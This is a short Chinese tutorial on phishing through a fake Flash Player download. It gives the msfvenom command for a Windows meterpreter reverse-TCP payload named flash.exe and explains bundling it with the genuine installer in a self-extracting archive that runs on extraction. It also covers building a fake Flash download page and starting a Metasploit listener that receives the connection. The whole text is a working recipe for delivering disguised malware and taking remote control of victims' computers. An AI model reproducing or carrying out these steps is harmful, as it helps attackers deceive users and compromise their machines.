通过Flash进行钓鱼

tip:本文只讨论钓鱼技术,未实现免杀。

制作木马

  • msfvenom

    1
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=6666 -f exe > flash.exe

  • 下载真正的Flash Player

    https://www.flash.cn/

  • 制作自解压格式压缩文件

    压缩文件设置

    点击自解压设置,设置解压后运行:

    自解压设置

制作假的Flash页面

通过Fake-flash.cn项目,即可制作一个Flash页面,通过修改下载地址,即可实现钓鱼网站。

监听端口

1
use exploit/multi/handler

监听端口

等待解压上线

成功上线